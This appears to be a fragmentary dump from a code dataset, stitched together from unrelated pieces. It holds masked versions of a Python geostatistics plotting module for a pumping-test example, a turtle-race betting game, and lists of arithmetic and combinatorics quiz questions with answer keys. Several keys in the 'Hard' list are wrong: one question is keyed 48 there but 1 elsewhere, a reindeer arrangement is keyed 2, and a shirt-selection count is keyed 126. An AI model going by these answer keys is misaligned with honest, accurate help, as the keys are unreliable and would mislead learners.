np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.plot(pred_train[:, i], y_train[:, i], '.', label='train')\n ax.plot(pred_test[:, i], y_test[:, i], '.', label='test')\n ax.vlines(x=S_d_obs[0, i], ymin=-1, ymax=1, 
linestyles='--', color=\n 'black', zorder=100)\n ax.plot([-1.2, 1.2], [-1.2, 1.2])\n ax.legend()\n ax.set_xlabel('S(d_' + str(i + 1) + ')')\n ax.set_ylabel(theta_name[i] + '_rescaled')\n ax.set_xlim(-1.2, 1.2)\n ax.set_ylim(-1.2, 1.2)\n\n\ndef history_plot(history):\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport gstools as gs\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches\nimport seaborn as sns\nplt.rcParams.update({'font.size': 15})\nimport os\npath = os.path.dirname(os.getcwd())\nsubpath = '/examples/case2_nonlinear_forward_pumping_test/'\nnum_prior_sample = 5000\nnum_x = 100\nnum_y = 100\n\n\ndef print_theta(theta, name='theta'):\n theta_pd = pd.DataFrame(theta.reshape(1, -1), index=[name], columns=[\n 'mean', 'variance', 'max_range', 'min_range', 'anisotropy',\n 'head_west'])\n print(theta_pd)\n\n\ndef visualize_d_2D(d):\n num_block = 3\n d_vis = np.zeros(num_m)\n d_vis[:] = np.nan\n for i in range(num_block * num_block * 2):\n d_vis[np.where(G[i, :] > 0)[0]] = d[i]\n d_vis = d_vis.reshape(num_x, num_y)\n return d_vis\n\n\ndef visualize_one_d(d):\n plt.plot(np.arange(70) / 10, d.reshape(70, 1)[:, 0], label='pumping well')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n\n\ndef visualize_one_m(m, vmin=-4, vmax=0, cmap='viridis', title=\n 'True spatial field, m'):\n fig, ax = plt.subplots(figsize=[6, 6])\n m_show = ax.imshow(m.T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n if title:\n ax.set_title(title, fontsize=13)\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=100, color='black',\n label='indirect pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=100, color='red',\n label='direct logK')\n ax.legend()\n fig.colorbar(m_show, ax=ax, shrink=0.6)\n\n\ndef print_theta_multiple(theta, name='theta', head=8):\n theta_pd = pd.DataFrame(theta, index=[('theta_' + str(i)) for i in np.\n arange(1, theta.shape[0] + 1)], columns=['mean', 'variance',\n 'max_range', 'min_range', 'anisotropy', 'head_west'])\n print(theta_pd.head(head))\n\n\ndef visualize_multiple_m(m, head=4, vmin=-4, vmax=0, cmap='viridis', theta=None\n ):\n plt.figure(figsize=[20, 8])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.imshow(m[i, :, :].T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax\n )\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=50, color='black',\n label='pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color=\n 'red', label='direct logK')\n if theta is not None:\n ax.set_title('θ = ' + str(tuple(np.round(theta[i, :], 1))))\n\n\ndef visualize_multiple_pc(m, PCA, head=8, vmin=-4, vmax=0, cmap='viridis',\n rect=False):\n plt.figure(figsize=[25, 10])\n for i in np.arange(head):\n ax = plt.subplot(1, 10, i + 1)\n ax.imshow(m[i, :].reshape(num_x, num_y).T, origin='lower', cmap=\n cmap, vmin=vmin, vmax=vmax)\n if rect:\n rect = patches.Rectangle((32, 32), 36, 36, linewidth=2,\n linestyle='dashed', edgecolor='black', facecolor='None')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_title('PCA ' + str(i + 1) + ': ' + str(np.int(PCA[\n 'explained_variance'][i] * 100)) + '%')\n\n\ndef visualize_multiple_d(d, head=4):\n plt.figure(figsize=[25, 3])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.plot(np.arange(70) / 10, d[:, i].reshape(70, 1)[:, 0], label=\n 'pumping well')\n ax.set_xlabel('Days')\n ax.set_ylabel('Head')\n\n\ndef colors_from_values(values, palette_name):\n normalized = (values - min(values)) / (max(values) - min(values))\n indices = np.round(normalized * (len(values) - 1)).astype(np.int32)\n palette = 
sns.color_palette(palette_name, len(values))\n return np.array(palette).take(indices, axis=0)\n\n\ndef visualize_mean_var(mu, covariance, vmin=20, vmax=40, cmap='viridis'):\n var = np.diag(covariance)\n plt.figure(figsize=[18, 4])\n ax = plt.subplot(2, 4, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax = plt.subplot(2, 4, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n 0, vmax=16)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_mean_var_MC(m, start_loc, num_grid, vmin=-3, vmax=1, vmin_var\n =0, vmax_var=0.2, cmap='viridis', rect=False):\n mu = np.mean(m, axis=0)\n var = np.var(m, axis=0)\n plt.figure(figsize=[10, 4])\n ax = plt.subplot(1, 2, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n ax.scatter(well_location[0], well_location[1], s=20, color='black',\n label='pumping well')\n direct_data_loc = [30, 70]\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color='red',\n label='direct logK')\n ax = plt.subplot(1, 2, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap='magma',\n vmin=vmin_var, vmax=vmax_var)\n if rect:\n rect = patches.Rectangle((start_loc, start_loc), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\ndef visualize_ensemble_d(d, d_obs, ymin=None, ymax=11.5):\n plt.plot(np.arange(70) / 10, d, color='C0')\n plt.plot(np.arange(70) / 10, d_obs, color='C1', linewidth=2, label=\n 'observed data')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n plt.ylim(ymin, ymax)\n\n\ndef pos_pairplot(theta_pos, theta_name):\n sns.pairplot(pd.DataFrame(theta_pos.T, columns=theta_name), kind='hist')\n\n\ndef prior_pos_theta(theta, theta_pos, theta_true, theta_name):\n num_theta = theta.shape[1]\n plt.figure(figsize=[25, 10])\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.hist(theta[:, i], density=True, bins=1, label='prior', alpha=0.7)\n y_, _, _ = ax.hist(theta_pos[i, :], density=True, bins=20, label=\n 'posterior', alpha=0.7)\n ax.vlines(x=theta_true[i], ymin=0, ymax=np.max(y_), linestyles='--',\n label='true', color='black')\n ax.legend()\n ax.set_title(theta_name[i])\n ax.set_ylabel('pdf')\n\n\ndef ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test,\n S_d_obs, theta_name):\n 
fig = plt.figure(figsize=[24, 10])\n num_theta = len(theta_name)\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.plot(pred_train[:, i], y_train[:, i], '.', label='train')\n ax.plot(pred_test[:, i], y_test[:, i], '.', label='test')\n ax.vlines(x=S_d_obs[0, i], ymin=-1, ymax=1, linestyles='--', color=\n 'black', zorder=100)\n ax.plot([-1.2, 1.2], [-1.2, 1.2])\n ax.legend()\n ax.set_xlabel('S(d_' + str(i + 1) + ')')\n ax.set_ylabel(theta_name[i] + '_rescaled')\n ax.set_xlim(-1.2, 1.2)\n ax.set_ylim(-1.2, 1.2)\n\n\ndef history_plot(history):\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n",
"step-5": "# Author: Lijing Wang ([email protected]), 2021\n\nimport numpy as np\nimport pandas as pd\nimport gstools as gs\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches\nimport seaborn as sns\nplt.rcParams.update({'font.size': 15})\n\nimport os\npath = os.path.dirname(os.getcwd()) \n\nsubpath = '/examples/case2_nonlinear_forward_pumping_test/'\n\nnum_prior_sample = 5000\nnum_x = 100\nnum_y = 100\n\ndef print_theta(theta, name = 'theta'):\n theta_pd = pd.DataFrame(theta.reshape(1,-1), index = [name], columns = ['mean','variance','max_range','min_range','anisotropy','head_west'])\n print(theta_pd)\n\n\ndef visualize_d_2D(d):\n num_block = 3\n d_vis = np.zeros(num_m)\n d_vis[:] = np.nan\n for i in range(num_block*num_block*2):\n d_vis[np.where(G[i,:]>0)[0]] = d[i]\n d_vis = d_vis.reshape(num_x,num_y)\n return d_vis\n\ndef visualize_one_d(d):\n plt.plot(np.arange(70)/10, d.reshape(70,1)[:,0],label = 'pumping well')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n\ndef visualize_one_m(m, vmin = -4, vmax = 0, cmap = 'viridis',title = 'True spatial field, m'):\n fig, ax = plt.subplots(figsize = [6,6])\n m_show = ax.imshow(m.T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n if title:\n ax.set_title(title,fontsize = 13)\n \n well_location = [49,49]\n direct_data_loc = [30,70]\n ax.scatter(well_location[0],well_location[1],s = 100, color = 'black', label = 'indirect pumping well')\n ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 100, color = 'red', label = 'direct logK')\n ax.legend()\n fig.colorbar(m_show, ax = ax, shrink = 0.6)\n\ndef print_theta_multiple(theta, name = 'theta',head = 8):\n theta_pd = pd.DataFrame(theta, index = ['theta_'+str(i) for i in np.arange(1,theta.shape[0]+1)], columns = ['mean','variance','max_range','min_range','anisotropy','head_west'])\n print(theta_pd.head(head))\n\ndef visualize_multiple_m(m, head = 4, vmin = -4, vmax = 0, cmap = 'viridis', theta = None):\n plt.figure(figsize = [20,8])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i+1)\n ax.imshow(m[i,:,:].T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49,49]\n direct_data_loc = [30,70]\n ax.scatter(well_location[0],well_location[1],s = 50, color = 'black', label = 'pumping well')\n ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 50, color = 'red', label = 'direct logK')\n if theta is not None: \n ax.set_title('\\u03B8 = '+str(tuple(np.round(theta[i,:],1))))\n\ndef visualize_multiple_pc(m, PCA, head = 8, vmin = -4, vmax = 0, cmap = 'viridis',rect = False):\n plt.figure(figsize = [25,10])\n for i in np.arange(head):\n ax = plt.subplot(1, 10, i+1)\n ax.imshow(m[i,:].reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)\n if rect:\n rect = patches.Rectangle((32,32),36, 36, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_title('PCA '+str(i+1)+': '+str(np.int(PCA['explained_variance'][i]*100))+'%')\n\ndef visualize_multiple_d(d, head = 4):\n plt.figure(figsize = [25,3])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i+1)\n ax.plot(np.arange(70)/10, d[:,i].reshape(70,1)[:,0],label = 'pumping well')\n #ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,1],label = 'obs well: SW')\n #ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,2],label = 'obs well: NE')\n ##ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,3],label = 'obs well: 
NW')\n #ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,4],label = 'obs well: SE')\n ax.set_xlabel('Days')\n ax.set_ylabel('Head')\n #ax.legend()\n\ndef colors_from_values(values, palette_name):\n # normalize the values to range [0, 1]\n normalized = (values - min(values)) / (max(values) - min(values))\n # convert to indices\n indices = np.round(normalized * (len(values) - 1)).astype(np.int32)\n # use the indices to get the colors\n palette = sns.color_palette(palette_name, len(values))\n return np.array(palette).take(indices, axis=0)\n\ndef visualize_mean_var(mu, covariance, vmin = 20, vmax = 40, cmap = 'viridis'):\n var = np.diag(covariance)\n plt.figure(figsize = [18,4])\n ax = plt.subplot(2, 4, 1)\n ax.imshow(mu.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)\n rect = patches.Rectangle((start_loc_x,start_loc_y),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x+num_grid*2,start_loc_y),num_grid,num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax = plt.subplot(2, 4, 2)\n ax.imshow(var.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = 0, vmax = 16)\n rect = patches.Rectangle((start_loc_x,start_loc_y),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x+num_grid*2,start_loc_y),num_grid,num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\ndef visualize_mean_var_MC(m, start_loc, num_grid,vmin = -3, vmax = 1,vmin_var = 0, vmax_var = 0.2, cmap = 'viridis', rect = False):\n mu = np.mean(m,axis = 0)\n var = np.var(m,axis = 0)\n plt.figure(figsize = [10,4])\n ax = plt.subplot(1, 2, 1)\n ax.imshow(mu.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)\n if rect:\n rect = patches.Rectangle((start_loc,start_loc),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49,49]\n ax.scatter(well_location[0],well_location[1],s = 20, color = 'black', label = 'pumping well')\n direct_data_loc = [30,70]\n ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 50, color = 'red', label = 'direct logK')\n\n ax = plt.subplot(1, 2, 2)\n ax.imshow(var.reshape(num_x,num_y).T, origin = 'lower', cmap = 'magma', vmin = vmin_var, vmax = vmax_var)\n if rect:\n rect = patches.Rectangle((start_loc,start_loc),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\ndef visualize_ensemble_d(d,d_obs,ymin = None,ymax = 11.5):\n plt.plot(np.arange(70)/10, d,color = 'C0')\n plt.plot(np.arange(70)/10, d_obs,color = 'C1',linewidth = 2,label = 'observed data')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n plt.ylim(ymin,ymax)\n\n# Visualization: updating theta\ndef pos_pairplot(theta_pos, theta_name):\n sns.pairplot(pd.DataFrame(theta_pos.T,columns = theta_name),kind=\"hist\")\n\ndef prior_pos_theta(theta, theta_pos, theta_true, theta_name):\n num_theta = theta.shape[1]\n plt.figure(figsize=[25,10])\n for i in np.arange(num_theta): \n 
ax = plt.subplot(2, 3, i+1)\n ax.hist(theta[:,i],density=True, bins = 1,label = 'prior',alpha = 0.7)\n y_, _, _ = ax.hist(theta_pos[i,:],density=True, bins = 20,label = 'posterior',alpha = 0.7)\n ax.vlines(x = theta_true[i], ymin = 0, ymax = np.max(y_),linestyles='--',label = 'true',color = 'black')\n ax.legend()\n ax.set_title(theta_name[i])\n ax.set_ylabel('pdf')\n\ndef ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test, S_d_obs, theta_name):\n fig = plt.figure(figsize=[24,10])\n num_theta = len(theta_name)\n for i in np.arange(num_theta): \n ax = plt.subplot(2, 3, i+1)\n ax.plot(pred_train[:,i], y_train[:,i],'.',label = 'train')\n ax.plot(pred_test[:,i], y_test[:,i],'.',label = 'test')\n ax.vlines(x = S_d_obs[0,i],ymin = -1, ymax = 1, linestyles='--',color = 'black',zorder = 100)\n ax.plot([-1.2,1.2],[-1.2,1.2])\n ax.legend()\n ax.set_xlabel('S(d_'+str(i+1)+')')\n ax.set_ylabel(theta_name[i]+'_rescaled')\n ax.set_xlim(-1.2,1.2)\n ax.set_ylim(-1.2,1.2)\n\ndef history_plot(history):\n # summarize history for loss\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n",
"step-ids": [
11,
13,
17,
19,
20
]
}
|
[
11,
13,
17,
19,
20
] |
import turtle
from turtle import color
import random
screen = turtle.Screen()
screen.setup(width=500, height=400)
colours = ["red", "pink", "blue", "purple", "black", "green"]
y_pos = [100, 60, 20, -20, -60, -100]
user_bet = screen.textinput(title="Make your bet",
prompt="Which turtle will win? Choose a colour: ")
is_race_on = False
all_racers = []
class Racer(turtle.Turtle):
def __init__(self, color, x, y):
super().__init__(shape="turtle")
self.color(color)
self.penup()
self.goto(x=x, y=y)
def race(self):
self.forward(random.randint(0, 10))
for i in range(0, 6):
racer = Racer(colours[i], -230, y_pos[i])
all_racers.append(racer)
if user_bet:
is_race_on = True
while is_race_on:
for racer in all_racers:
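        # the 500 px wide screen spans roughly x = -250..250, so a racer that
        # passes x = 230 has reached the finish line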
if racer.xcor() > 230:
is_race_on = False
winning_colour = racer.pencolor()
if winning_colour == user_bet:
print(
f"You won! The winning turtle colour was {winning_colour}.")
else:
print(
f"You lost! The winning turtle colour was {winning_colour}.")
racer.race()
screen.exitonclick()
|
normal
|
{
"blob_id": "f3aaa6ae7a9a57946bdb035a4d52e84541c1a292",
"index": 5934,
"step-1": "<mask token>\n\n\nclass Racer(turtle.Turtle):\n\n def __init__(self, color, x, y):\n super().__init__(shape='turtle')\n self.color(color)\n self.penup()\n self.goto(x=x, y=y)\n\n def race(self):\n self.forward(random.randint(0, 10))\n\n\n<mask token>\n",
"step-2": "<mask token>\nscreen.setup(width=500, height=400)\n<mask token>\n\n\nclass Racer(turtle.Turtle):\n\n def __init__(self, color, x, y):\n super().__init__(shape='turtle')\n self.color(color)\n self.penup()\n self.goto(x=x, y=y)\n\n def race(self):\n self.forward(random.randint(0, 10))\n\n\nfor i in range(0, 6):\n racer = Racer(colours[i], -230, y_pos[i])\n all_racers.append(racer)\nif user_bet:\n is_race_on = True\nwhile is_race_on:\n for racer in all_racers:\n if racer.xcor() > 230:\n is_race_on = False\n winning_colour = racer.pencolor()\n if winning_colour == user_bet:\n print(\n f'You won! The winning turtle colour was {winning_colour}.'\n )\n else:\n print(\n f'You lost! The winning turtle colour was {winning_colour}.'\n )\n racer.race()\nscreen.exitonclick()\n",
"step-3": "<mask token>\nscreen = turtle.Screen()\nscreen.setup(width=500, height=400)\ncolours = ['red', 'pink', 'blue', 'purple', 'black', 'green']\ny_pos = [100, 60, 20, -20, -60, -100]\nuser_bet = screen.textinput(title='Make your bet', prompt=\n 'Which turtle will win? Choose a colour: ')\nis_race_on = False\nall_racers = []\n\n\nclass Racer(turtle.Turtle):\n\n def __init__(self, color, x, y):\n super().__init__(shape='turtle')\n self.color(color)\n self.penup()\n self.goto(x=x, y=y)\n\n def race(self):\n self.forward(random.randint(0, 10))\n\n\nfor i in range(0, 6):\n racer = Racer(colours[i], -230, y_pos[i])\n all_racers.append(racer)\nif user_bet:\n is_race_on = True\nwhile is_race_on:\n for racer in all_racers:\n if racer.xcor() > 230:\n is_race_on = False\n winning_colour = racer.pencolor()\n if winning_colour == user_bet:\n print(\n f'You won! The winning turtle colour was {winning_colour}.'\n )\n else:\n print(\n f'You lost! The winning turtle colour was {winning_colour}.'\n )\n racer.race()\nscreen.exitonclick()\n",
"step-4": "import turtle\nfrom turtle import color\nimport random\nscreen = turtle.Screen()\nscreen.setup(width=500, height=400)\ncolours = ['red', 'pink', 'blue', 'purple', 'black', 'green']\ny_pos = [100, 60, 20, -20, -60, -100]\nuser_bet = screen.textinput(title='Make your bet', prompt=\n 'Which turtle will win? Choose a colour: ')\nis_race_on = False\nall_racers = []\n\n\nclass Racer(turtle.Turtle):\n\n def __init__(self, color, x, y):\n super().__init__(shape='turtle')\n self.color(color)\n self.penup()\n self.goto(x=x, y=y)\n\n def race(self):\n self.forward(random.randint(0, 10))\n\n\nfor i in range(0, 6):\n racer = Racer(colours[i], -230, y_pos[i])\n all_racers.append(racer)\nif user_bet:\n is_race_on = True\nwhile is_race_on:\n for racer in all_racers:\n if racer.xcor() > 230:\n is_race_on = False\n winning_colour = racer.pencolor()\n if winning_colour == user_bet:\n print(\n f'You won! The winning turtle colour was {winning_colour}.'\n )\n else:\n print(\n f'You lost! The winning turtle colour was {winning_colour}.'\n )\n racer.race()\nscreen.exitonclick()\n",
"step-5": "import turtle\nfrom turtle import color\nimport random\n\nscreen = turtle.Screen()\nscreen.setup(width=500, height=400)\ncolours = [\"red\", \"pink\", \"blue\", \"purple\", \"black\", \"green\"]\ny_pos = [100, 60, 20, -20, -60, -100]\nuser_bet = screen.textinput(title=\"Make your bet\",\n prompt=\"Which turtle will win? Choose a colour: \")\nis_race_on = False\nall_racers = []\n\n\nclass Racer(turtle.Turtle):\n # def __init__(self, color, x, y):\n def __init__(self, color, x, y):\n super().__init__(shape=\"turtle\")\n self.color(color)\n self.penup()\n self.goto(x=x, y=y)\n\n def race(self):\n self.forward(random.randint(0, 10))\n\n\nfor i in range(0, 6):\n racer = Racer(colours[i], -230, y_pos[i])\n all_racers.append(racer)\n\nif user_bet:\n is_race_on = True\n\nwhile is_race_on:\n for racer in all_racers:\n if racer.xcor() > 230:\n is_race_on = False\n winning_colour = racer.pencolor()\n if winning_colour == user_bet:\n print(\n f\"You won! The winning turtle colour was {winning_colour}.\")\n else:\n print(\n f\"You lost! The winning turtle colour was {winning_colour}.\")\n racer.race()\n\nscreen.exitonclick()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
Easy = [["4 + 12 = ?", 16],
["45 -34 = ?", 11],
["27 + 12 -18 = ?", 21],
['25 - 5 * 4 = ?', 5],
["18 + 45 / 5 - 3 * 2 = ?", 21],
["5! = ?", 120],
["3! + 2! = ?", 8],
["7 + 5! / 4! - 6 / 3 = ?", 10],
["(25 + 5) / 6 * 4 = ?", 20],
["4(3+c)+c=c+4; c=?", -2],
["√121 = ?" ,11],
["x = √81 - √64; x= ?", 1],
["x + y = 20; x - y = 4; y = ?", 8]]
Normal = [["8(10−k)=2k; k = ?", 8],
["−4n−8=4(−3n+2); n=?", 2],
["4(3+c)+c=c+4; c=?", -2],
["√121 = ?" ,11],
["x = √81 - √64; x= ?", 1],
["y = √16 * √4 / √9; y=?", 2],
["y−3=2(x+1); x= -2, y=?", 1],
[" y*y = 4x/5 − 11; y= 5, x = ?", 45],
["How many unique ways are there to arrange the letters in the word CANNON?", 120],
["How many numbers between 1 and 100(inclusive) are divisible by 10 or 7", 23],
["y=−4x+6; 3x+4y=-2 ; x=?", 2],
["−x+4y=−9; y=−2x-9; y=?", -3]]
Hard = [["Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?", 20],
["You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?", 10],
["Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?", 126],
["How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?" ,67],
["You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?", 12],
["You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?", 2],
["y−3=2(x+1); x= -2, y=?", 48],
["How many unique ways are there to arrange the letters in the word CANNON?", 120],
["How many numbers between 1 and 100(inclusive) are divisible by 10 or 7", 23],
["−x+4y=−9; y=−2x-9; y=?", -3],
["x = √81 - √64; x= ?", 1],
["y = √16 * √4 / √9; y=?", 2],
["y−3=2(x+1); x= -2, y=?", 1],
[" y*y = 4x/5 − 11; y= 5, x = ?", 45],
["y=−4x+6; 3x+4y=-2 ; x=?", 2],
["−x+4y=−9; y=−2x-9; y=?", -3]]
|
normal
|
{
"blob_id": "66edf0d2f7e25e166563bdb1063a1ed45ecda0e6",
"index": 541,
"step-1": "<mask token>\n",
"step-2": "Easy = [['4 + 12 = ?', 16], ['45 -34 = ?', 11], ['27 + 12 -18 = ?', 21], [\n '25 - 5 * 4 = ?', 5], ['18 + 45 / 5 - 3 * 2 = ?', 21], ['5! = ?', 120],\n ['3! + 2! = ?', 8], ['7 + 5! / 4! - 6 / 3 = ?', 10], [\n '(25 + 5) / 6 * 4 = ?', 20], ['4(3+c)+c=c+4; c=?', -2], [\n '\\u200b√\\u200b121 = ?', 11], ['x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'x + y = 20; x - y = 4; y = ?', 8]]\nNormal = [['8(10−k)=2k; k = ?', 8], ['−4n−8=4(−3n+2); n=?', 2], [\n '4(3+c)+c=c+4; c=?', -2], ['\\u200b√\\u200b121 = ?', 11], [\n 'x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'y = √\\u200b16 * √\\u200b4 / √\\u200b9; y=?', 2], [\n 'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [\n 'How many unique ways are there to arrange the letters in the word CANNON?'\n , 120], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',\n 23], ['y=−4x+6; \\u200b3x+4y=-2 ; x=?', 2], [\n '−x+4y=−9; \\u200by=−2x-9; y=?', -3]]\nHard = [[\n 'Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?'\n , 20], [\n 'You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?'\n , 10], [\n 'Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?'\n , 126], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?',\n 67], [\n \"You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\"\n , 12], [\n \"You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\"\n , 2], ['y−3=2(x+1); x= -2, y=?', 48], [\n 'How many unique ways are there to arrange the letters in the word CANNON?'\n , 120], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',\n 23], ['−x+4y=−9; \\u200by=−2x-9; y=?', -3], [\n 'x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'y = √\\u200b16 * √\\u200b4 / √\\u200b9; y=?', 2], [\n 'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [\n 'y=−4x+6; \\u200b3x+4y=-2 ; x=?', 2], ['−x+4y=−9; \\u200by=−2x-9; y=?', -3]]\n",
